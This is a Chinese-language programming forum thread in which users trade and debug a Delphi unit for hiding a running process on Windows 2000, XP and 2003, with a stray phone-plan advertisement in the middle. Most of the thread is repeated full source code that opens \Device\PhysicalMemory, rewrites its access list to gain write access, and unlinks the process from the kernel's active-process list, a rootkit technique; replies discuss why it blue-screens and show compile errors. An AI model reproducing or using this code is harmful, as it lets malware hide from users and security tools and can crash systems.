隐藏进程代码引起的蓝屏？？未解决！

这是一个隐藏进程的代码，做成单元引用时，有时蓝屏！
哪位帮看一下
或者哪位有收藏且试用过没问题的隐藏进程代码，请发一下？
unit HideProcess;interfacefunction MyHideProcess: Boolean;implementationuses
Windows, SysUtils, Variants, Classes, AclAPI, accCtrl;type
NTSTATUS = LongInt;const
//NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
OBJ_INHERIT = $00000002;
OBJ_PERMANENT = $00000010;
OBJ_EXCLUSIVE = $00000020;
OBJ_CASE_INSENSITIVE = $00000040;
OBJ_OPENIF = $00000080;
OBJ_OPENLINK = $00000100;
OBJ_KERNEL_HANDLE = $00000200;
OBJ_VALID_ATTRIBUTES = $000003F2;type
PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
IO_STATUS_BLOCK = record
Status: NTSTATUS;
FObject: DWORD;
end;PUNICODE_STRING = ^UNICODE_STRING;
UNICODE_STRING = record
Length: Word;
MaximumLength: Word;
Buffer: PWideChar;
end;POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
OBJECT_ATTRIBUTES = record
Length: DWORD;
RootDirectory: Pointer;
ObjectName: PUNICODE_STRING;
Attributes: DWORD;
SecurityDescriptor: Pointer;
SecurityQualityOfService: Pointer;
end;TZwOpenSection = function(SectionHandle: PHandle;
DesiredAccess: ACCESS_MASK;
ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
SourceString: PWideChar); stdcall;var
RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
ZwOpenSection: TZwOpenSection = nil;
g_hNtDLL: THandle = 0;
g_pMapPhysicalMemory: Pointer = nil;
g_hMPM: THandle = 0;
g_hMPM2: THandle = 0;
g_osvi: OSVERSIONINFO;
b_hide: Boolean = false;
//---------------------------------------------------------------------------function InitNTDLL: Boolean;
begin
g_hNtDLL := LoadLibrary('ntdll.dll');if 0 = g_hNtDLL then
begin
Result := false;
Exit;
end;RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection');Result := True;
end;
//---------------------------------------------------------------------------procedure CloseNTDLL;
begin
if (0 <> g_hNtDLL) then
FreeLibrary(g_hNtDLL);
g_hNtDLL := 0;
end;
//---------------------------------------------------------------------------procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
var
pDacl: PACL;
pSD: PPSECURITY_DESCRIPTOR;
pNewDacl: PACL;
dwRes: DWORD;
ea: EXPLICIT_ACCESS;
begin
pDacl := nil;
pSD := nil;
pNewDacl := nil;dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end;ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions := SECTION_MAP_WRITE;
ea.grfAccessMode := GRANT_ACCESS;
ea.grfInheritance := NO_INHERITANCE;
ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
ea.Trustee.ptstrName := 'CURRENT_USER';dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end;dwRes := SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end;end;
//---------------------------------------------------------------------------function OpenPhysicalMemory: THandle;
var
status: NTSTATUS;
physmemString: UNICODE_STRING;
attributes: OBJECT_ATTRIBUTES;
PhyDirectory: DWORD;
begin
g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);
GetVersionEx(g_osvi);if (5 <> g_osvi.dwMajorVersion) then
begin
Result := 0;
Exit;
end;case g_osvi.dwMinorVersion of
0: PhyDirectory := $30000;
1: PhyDirectory := $39000;
else
begin
Result := 0;
Exit;
end;
end;RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');attributes.Length := SizeOf(OBJECT_ATTRIBUTES);
attributes.RootDirectory := nil;
attributes.ObjectName := @physmemString;
attributes.Attributes := 0;
attributes.SecurityDescriptor := nil;
attributes.SecurityQualityOfService := nil;status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);if (status = STATUS_ACCESS_DENIED) then
begin
ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
end;if not (LongInt(status) >= 0) then
begin
Result := 0;
Exit;
end;g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);if (g_pMapPhysicalMemory = nil) then
begin
Result := 0;
Exit;
end;Result := g_hMPM;
end;
//---------------------------------------------------------------------------

解决方案 »

免费领取超大流量手机卡，每月29元包185G流量+100分钟通话, 中国电信官方发货

function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;
var
VAddr, PGDE, PTE, PAddr, tmp: DWORD;
begin
VAddr := DWORD(addr);
// PGDE := BaseAddress[VAddr shr 22];
PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // modify by dot.if 0 = (PGDE and 1) then
begin
Result := nil;
Exit;
end;tmp := PGDE and $00000080;if (0 <> tmp) then
begin
PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);
end
else
begin
PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
// PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];
PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // modify by dot.if (0 = (PTE and 1)) then
begin
Result := nil;
Exit;
end;PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);
UnmapViewOfFile(Pointer(PGDE));
end;Result := Pointer(PAddr);
end;
//---------------------------------------------------------------------------function GetData(addr: Pointer): DWORD;
var
phys, ret: DWORD;
tmp: PDWORD;
begin
phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,
phys and $FFFFF000, $1000));if (nil = tmp) then
begin
Result := 0;
Exit;
end;// ret := tmp[(phys and $FFF) shr 2];
ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // modify by dot.
UnmapViewOfFile(tmp);Result := ret;
end;
//---------------------------------------------------------------------------function SetData(addr: Pointer; data: DWORD): Boolean;
var
phys: DWORD;
tmp: PDWORD;
begin
phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));if (nil = tmp) then
begin
Result := false;
Exit;
end;// tmp[(phys and $FFF) shr 2] := data;
PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data; // modify by dot.
UnmapViewOfFile(tmp);Result := TRUE;
end;
//---------------------------------------------------------------------------
{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
begin
ExitProcess(0);
return 1 ;
end }
//---------------------------------------------------------------------------function YHideProcess: Boolean;
var
thread, process: DWORD;
fw, bw: DWORD;
begin
// SetUnhandledExceptionFilter(exeception);
if (FALSE = InitNTDLL) then
begin
Result := FALSE;
Exit;
end;if (0 = OpenPhysicalMemory) then
begin
Result := FALSE;
Exit;
end;thread := GetData(Pointer($FFDFF124)); //kteb
process := GetData(Pointer(thread + $44)); //kpebif (0 = g_osvi.dwMinorVersion) then
begin
fw := GetData(Pointer(process + $A0));
bw := GetData(Pointer(process + $A4));SetData(Pointer(fw + 4), bw);
SetData(Pointer(bw), fw);Result := TRUE;
end
else if (1 = g_osvi.dwMinorVersion) then
begin
fw := GetData(Pointer(process + $88));
bw := GetData(Pointer(process + $8C));SetData(Pointer(fw + 4), bw);
SetData(Pointer(bw), fw);Result := TRUE;
end
else
begin
Result := False;
end;CloseHandle(g_hMPM);
CloseNTDLL;
end;function MyHideProcess: Boolean;
begin
if not b_hide then
begin
b_hide := YHideProcess;
end;Result := b_hide;
end;end.
HideProcess是隐藏进程的代码單元,我之前使用時沒有出現過類似的問題,不知道LZ在調試時在哪部分出現問題,請貼出相關代碼!
用法：implementationuses HideProcess;过程调用begin
    MyHideProcess;....
end;
代码太长了
你Debug的时候到底哪有错呢?
加一个
Refresh;
进去
我用過不會出現類似情況，給你我所用的代碼，應該是一樣的吧，你有在多台電腦上測試嗎？有沒有可能是你電腦的問題!
type
  NTSTATUS = LongInt;
const
  STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
  STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
  OBJ_INHERIT = $00000002;
  OBJ_PERMANENT = $00000010;
  OBJ_EXCLUSIVE = $00000020;
  OBJ_CASE_INSENSITIVE = $00000040;
  OBJ_OPENIF = $00000080;
  OBJ_OPENLINK = $00000100;
  OBJ_KERNEL_HANDLE = $00000200;
  OBJ_VALID_ATTRIBUTES = $000003F2;type
  PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
  IO_STATUS_BLOCK = record
    Status: NTSTATUS;
    FObject: DWORD;
  end;  PUNICODE_STRING = ^UNICODE_STRING;
  UNICODE_STRING = record
    Length: Word;
    MaximumLength: Word;
    Buffer: PWideChar;
  end;  POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
  OBJECT_ATTRIBUTES = record
    Length: DWORD;
    RootDirectory: Pointer;
    ObjectName: PUNICODE_STRING;
    Attributes: DWORD;
    SecurityDescriptor: Pointer;
    SecurityQualityOfService: Pointer;
  end;  TZwOpenSection = function(SectionHandle: PHandle;
    DesiredAccess: ACCESS_MASK;
    ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
  TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
    SourceString: PWideChar); stdcall;var
  RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
  ZwOpenSection: TZwOpenSection = nil;
  g_hNtDLL: THandle = 0;
  g_pMapPhysicalMemory: Pointer = nil;
  g_hMPM: THandle = 0;
  g_hMPM2: THandle = 0;
  g_osvi: OSVERSIONINFO;
  b_hide: Boolean = false;
//---------------------------------------------------------------------------function InitNTDLL: Boolean;
begin
  g_hNtDLL := LoadLibrary('ntdll.dll');  if 0=g_hNtDLL then
  begin
    Result:=false;
    Exit;
  end;  RtlInitUnicodeString:=GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
  ZwOpenSection:=GetProcAddress(g_hNtDLL, 'ZwOpenSection');  Result:=True;
end;
//---------------------------------------------------------------------------procedure CloseNTDLL;
begin
  if (0 <> g_hNtDLL) then
    FreeLibrary(g_hNtDLL);
  g_hNtDLL := 0;
end;
//---------------------------------------------------------------------------procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
var
  pDacl:PACL;
  pSD:PPSECURITY_DESCRIPTOR;
  pNewDacl:PACL;
  dwRes:DWORD;
  ea:EXPLICIT_ACCESS;
begin
  pDacl:=nil;
  pSD:=nil;
  pNewDacl:=nil;  dwRes:=GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;  ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
  ea.grfAccessPermissions:=SECTION_MAP_WRITE;
  ea.grfAccessMode:=GRANT_ACCESS;
  ea.grfInheritance:=NO_INHERITANCE;
  ea.Trustee.TrusteeForm:=TRUSTEE_IS_NAME;
  ea.Trustee.TrusteeType:=TRUSTEE_IS_USER;
  ea.Trustee.ptstrName:='CURRENT_USER';  dwRes:=SetEntriesInAcl(1, @ea, pDacl, pNewDacl);  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;  dwRes := SetSecurityInfo  (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;end;
//---------------------------------------------------------------------------function OpenPhysicalMemory: THandle;
var
  status:NTSTATUS;
  physmemString:UNICODE_STRING;
  attributes:OBJECT_ATTRIBUTES;
  PhyDirectory:DWORD;
begin
  g_osvi.dwOSVersionInfoSize:=sizeof(OSVERSIONINFO);
  GetVersionEx(g_osvi);  if (5 <> g_osvi.dwMajorVersion) then
  begin
    Result:=0;
    Exit;
  end;  case g_osvi.dwMinorVersion of
    0: PhyDirectory := $30000;
    1: PhyDirectory := $39000;
  else
    begin
      Result:=0;
      Exit;
    end;
  end;  RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');  attributes.Length:=SizeOf(OBJECT_ATTRIBUTES);
  attributes.RootDirectory:=nil;
  attributes.ObjectName:=@physmemString;
  attributes.Attributes:=0;
  attributes.SecurityDescriptor:=nil;
  attributes.SecurityQualityOfService:=nil;  status:=ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);  if (status = STATUS_ACCESS_DENIED) then
  begin
    ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
    SetPhyscialMemorySectionCanBeWrited(g_hMPM);
    CloseHandle(g_hMPM);    status:=ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
  end;  if not (LongInt(status) >= 0) then
  begin
    Result:=0;
    Exit;
  end;  g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
    FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);  if (g_pMapPhysicalMemory = nil) then
  begin
    Result:=0;
    Exit;
  end;  Result:=g_hMPM;
end;
//---------------------------------------------------------------------------function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;
var
  VAddr,PGDE,PTE,PAddr,tmp:DWORD;
begin
  VAddr:=DWORD(addr);
  PGDE:=PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // Modify by dot.  if 0 = (PGDE and 1) then
  begin
    Result:=nil;
    Exit;
  end;  tmp := PGDE and $00000080;  if (0 <> tmp) then
  begin
    PAddr:=(PGDE and $FFC00000) + (VAddr and $003FFFFF);
  end
  else
  begin
    PGDE:=DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
    PTE:=PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // Modify by dot.    if (0 = (PTE and 1)) then
    begin
      Result:=nil;
      Exit;
    end;    PAddr:=(PTE and $FFFFF000) + (VAddr and $00000FFF);
    UnmapViewOfFile(Pointer(PGDE));
  end;  Result:=Pointer(PAddr);
end;
//---------------------------------------------------------------------------function GetData(addr: Pointer): DWORD;
var
  phys,ret:DWORD;
  tmp:PDWORD;
begin
  phys:=ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
  tmp:=PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,
    phys and $FFFFF000, $1000));  if (nil=tmp) then
  begin
    Result:=0;
    Exit;
  end;//  ret:=tmp[(phys and $FFF) shr 2];
  ret:=PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // Modify by dot.
  UnmapViewOfFile(tmp);  Result:=ret;
end;
//---------------------------------------------------------------------------
function SetData(addr: Pointer; data: DWORD): Boolean;
var
  phys:DWORD;
  tmp:PDWORD;
begin
  phys:=ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
  tmp:=PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));  if (nil = tmp) then
  begin
    Result:=false;
    Exit;
  end;//  tmp[(phys and $FFF) shr 2] := data;
  PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^:=data; // Modify by dot.
  UnmapViewOfFile(tmp);  Result := TRUE;
end;
//---------------------------------------------------------------------------
{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
begin
ExitProcess(0);
return 1 ;
end }
//---------------------------------------------------------------------------function YHideProcess:Boolean;
var
  thread,process:DWORD;
  fw,bw:DWORD;
begin
//  SetUnhandledExceptionFilter(exeception);
  if (FALSE=InitNTDLL) then
  begin
    Result:=FALSE;
    Exit;
  end;  if (0 = OpenPhysicalMemory) then
  begin
    Result:=FALSE;
    Exit;
  end;  thread:=GetData(Pointer($FFDFF124)); //kteb
  process:=GetData(Pointer(thread + $44)); //kpeb  if (0 = g_osvi.dwMinorVersion) then       //win2000
  begin
    fw:=GetData(Pointer(process + $A0));
    bw:=GetData(Pointer(process + $A4));
    SetData(Pointer(fw + 4), bw);
    SetData(Pointer(bw), fw);
    Result:=TRUE;
  end
  else if (1 = g_osvi.dwMinorVersion) then   //winXP
  begin
    fw:=GetData(Pointer(process + $88));
    bw:=GetData(Pointer(process + $8C));    SetData(Pointer(fw + 4),bw);
    SetData(Pointer(bw),fw);
    Result:=TRUE;
  end
  else if (2 = g_osvi.dwMinorVersion) then   //win2003
  begin
    fw:=GetData(Pointer(process + $8A));
    bw:=GetData(Pointer(process + $8E));    SetData(Pointer(fw + 4), bw);
    SetData(Pointer(bw), fw);
    Result:=TRUE;
  end
  else
  begin
    Result:=False;
  end;
  CloseHandle(g_hMPM);
  CloseNTDLL;
end;function HideProcess:Boolean;
begin
  if not b_hide then
  begin
    b_hide:=YHideProcess;
  end;
  Result:=b_hide;
end;
zhao_yong 谢谢，好像真是一样的！
我的电脑绝对不会有问题的！
我只在我的实机和虚拟机中测试，结果都是蓝屏
实机和虚拟机是ｘｐ系统
很多时候是版本的不同
else if (1 = g_osvi.dwMinorVersion) then   //winXP
写内存？？……………………
每个XP版本的内存偏移地址是不同的，如果是SP2，这个地址不会和原版或者SP1相同，你这个代码估计是用错版本了，上网多找几个试试，或者就用zhao_yong的办法
zhao_yong的代码报错？
unit HideProcess;interfacefunction MyHideProcess: Boolean;implementationuses
Windows, SysUtils, Variants, Classes, AclAPI, accCtrl;type
  NTSTATUS = LongInt;
const
  STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
  STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
  OBJ_INHERIT = $00000002;
  OBJ_PERMANENT = $00000010;
  OBJ_EXCLUSIVE = $00000020;
  OBJ_CASE_INSENSITIVE = $00000040;
  OBJ_OPENIF = $00000080;
  OBJ_OPENLINK = $00000100;
  OBJ_KERNEL_HANDLE = $00000200;
  OBJ_VALID_ATTRIBUTES = $000003F2;type
  PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
  IO_STATUS_BLOCK = record
    Status: NTSTATUS;
    FObject: DWORD;
  end;  PUNICODE_STRING = ^UNICODE_STRING;
  UNICODE_STRING = record
    Length: Word;
    MaximumLength: Word;
    Buffer: PWideChar;
  end;  POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
  OBJECT_ATTRIBUTES = record
    Length: DWORD;
    RootDirectory: Pointer;
    ObjectName: PUNICODE_STRING;
    Attributes: DWORD;
    SecurityDescriptor: Pointer;
    SecurityQualityOfService: Pointer;
  end;  TZwOpenSection = function(SectionHandle: PHandle;
    DesiredAccess: ACCESS_MASK;
    ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
  TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
    SourceString: PWideChar); stdcall;var
  RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
  ZwOpenSection: TZwOpenSection = nil;
  g_hNtDLL: THandle = 0;
  g_pMapPhysicalMemory: Pointer = nil;
  g_hMPM: THandle = 0;
  g_hMPM2: THandle = 0;
  g_osvi: OSVERSIONINFO;
  b_hide: Boolean = false;
//---------------------------------------------------------------------------function InitNTDLL: Boolean;
begin
  g_hNtDLL := LoadLibrary('ntdll.dll');  if 0=g_hNtDLL then
  begin
    Result:=false;
    Exit;
  end;  RtlInitUnicodeString:=GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
  ZwOpenSection:=GetProcAddress(g_hNtDLL, 'ZwOpenSection');  Result:=True;
end;
//---------------------------------------------------------------------------procedure CloseNTDLL;
begin
  if (0 <> g_hNtDLL) then
    FreeLibrary(g_hNtDLL);
  g_hNtDLL := 0;
end;
//---------------------------------------------------------------------------procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
var
  pDacl:PACL;
  pSD:PPSECURITY_DESCRIPTOR;
  pNewDacl:PACL;
  dwRes:DWORD;
  ea:EXPLICIT_ACCESS;
begin
  pDacl:=nil;
  pSD:=nil;
  pNewDacl:=nil;  dwRes:=GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;  ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
  ea.grfAccessPermissions:=SECTION_MAP_WRITE;
  ea.grfAccessMode:=GRANT_ACCESS;
  ea.grfInheritance:=NO_INHERITANCE;
  ea.Trustee.TrusteeForm:=TRUSTEE_IS_NAME;
  ea.Trustee.TrusteeType:=TRUSTEE_IS_USER;
  ea.Trustee.ptstrName:='CURRENT_USER';  dwRes:=SetEntriesInAcl(1, @ea, pDacl, pNewDacl);  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;  dwRes := SetSecurityInfo  (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;end;
//---------------------------------------------------------------------------function OpenPhysicalMemory: THandle;
var
  status:NTSTATUS;
  physmemString:UNICODE_STRING;
  attributes:OBJECT_ATTRIBUTES;
  PhyDirectory:DWORD;
begin
  g_osvi.dwOSVersionInfoSize:=sizeof(OSVERSIONINFO);
  GetVersionEx(g_osvi);  if (5 <> g_osvi.dwMajorVersion) then
  begin
    Result:=0;
    Exit;
  end;  case g_osvi.dwMinorVersion of
    0: PhyDirectory := $30000;
    1: PhyDirectory := $39000;
  else
    begin
      Result:=0;
      Exit;
    end;
  end;  RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');  attributes.Length:=SizeOf(OBJECT_ATTRIBUTES);
  attributes.RootDirectory:=nil;
  attributes.ObjectName:=@physmemString;
  attributes.Attributes:=0;
  attributes.SecurityDescriptor:=nil;
  attributes.SecurityQualityOfService:=nil;  status:=ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);  if (status = STATUS_ACCESS_DENIED) then
  begin
    ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
    SetPhyscialMemorySectionCanBeWrited(g_hMPM);
    CloseHandle(g_hMPM);    status:=ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
  end;  if not (LongInt(status) >= 0) then
  begin
    Result:=0;
    Exit;
  end;  g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
    FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);  if (g_pMapPhysicalMemory = nil) then
  begin
    Result:=0;
    Exit;
  end;  Result:=g_hMPM;
end;
//---------------------------------------------------------------------------function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;
var
  VAddr,PGDE,PTE,PAddr,tmp:DWORD;
begin
  VAddr:=DWORD(addr);
  PGDE:=PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // Modify by dot.  if 0 = (PGDE and 1) then
  begin
    Result:=nil;
    Exit;
  end;
tmp := PGDE and $00000080;  if (0 <> tmp) then
  begin
    PAddr:=(PGDE and $FFC00000) + (VAddr and $003FFFFF);
  end
  else
  begin
    PGDE:=DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
    PTE:=PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // Modify by dot.    if (0 = (PTE and 1)) then
    begin
      Result:=nil;
      Exit;
    end;    PAddr:=(PTE and $FFFFF000) + (VAddr and $00000FFF);
    UnmapViewOfFile(Pointer(PGDE));
  end;  Result:=Pointer(PAddr);
end;
//---------------------------------------------------------------------------function GetData(addr: Pointer): DWORD;
var
  phys,ret:DWORD;
  tmp:PDWORD;
begin
  phys:=ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
  tmp:=PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,
    phys and $FFFFF000, $1000));  if (nil=tmp) then
  begin
    Result:=0;
    Exit;
  end;//  ret:=tmp[(phys and $FFF) shr 2];
  ret:=PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // Modify by dot.
  UnmapViewOfFile(tmp);  Result:=ret;
end;
//---------------------------------------------------------------------------function SetData(addr: Pointer; data: DWORD): Boolean;
var
  phys:DWORD;
  tmp:PDWORD;
begin
  phys:=ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
  tmp:=PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));  if (nil = tmp) then
  begin
    Result:=false;
    Exit;
  end;//  tmp[(phys and $FFF) shr 2] := data;
  PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^:=data; // Modify by dot.
  UnmapViewOfFile(tmp);  Result := TRUE;
end;
//---------------------------------------------------------------------------
{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
begin
ExitProcess(0);
return 1 ;
end }
//---------------------------------------------------------------------------function YHideProcess:Boolean;
var
  thread,process:DWORD;
  fw,bw:DWORD;
begin
//  SetUnhandledExceptionFilter(exeception);
  if (FALSE=InitNTDLL) then
  begin
    Result:=FALSE;
    Exit;
  end;  if (0 = OpenPhysicalMemory) then
  begin
    Result:=FALSE;
    Exit;
  end;  thread:=GetData(Pointer($FFDFF124)); //kteb
  process:=GetData(Pointer(thread + $44)); //kpeb  if (0 = g_osvi.dwMinorVersion) then       //win2000
  begin
    fw:=GetData(Pointer(process + $A0));
    bw:=GetData(Pointer(process + $A4));
    SetData(Pointer(fw + 4), bw);
    SetData(Pointer(bw), fw);
    Result:=TRUE;
  end
  else if (1 = g_osvi.dwMinorVersion) then   //winXP
  begin
    fw:=GetData(Pointer(process + $88));
    bw:=GetData(Pointer(process + $8C));    SetData(Pointer(fw + 4),bw);
    SetData(Pointer(bw),fw);
    Result:=TRUE;
  end
  else if (2 = g_osvi.dwMinorVersion) then   //win2003
  begin
    fw:=GetData(Pointer(process + $8A));
    bw:=GetData(Pointer(process + $8E));    SetData(Pointer(fw + 4), bw);
    SetData(Pointer(bw), fw);
    Result:=TRUE;
  end
  else
  begin
    Result:=False;
  end;
  CloseHandle(g_hMPM);
  CloseNTDLL;
end;function HideProcess:Boolean;这句报错！
begin
  if not b_hide then
  begin
    b_hide:=YHideProcess;
  end;
  Result:=b_hide;
end;[Error] HideProcess.pas(356): Identifier redeclared: 'HideProcess'
[Error] HideProcess.pas(366): Declaration expected but end of file found
[Error] HideProcess.pas(5): Unsatisfied forward or external declaration: 'MyHideProcess'
[Fatal Error] Unit1.pas(7): Could not compile used unit 'HideProcess.pas'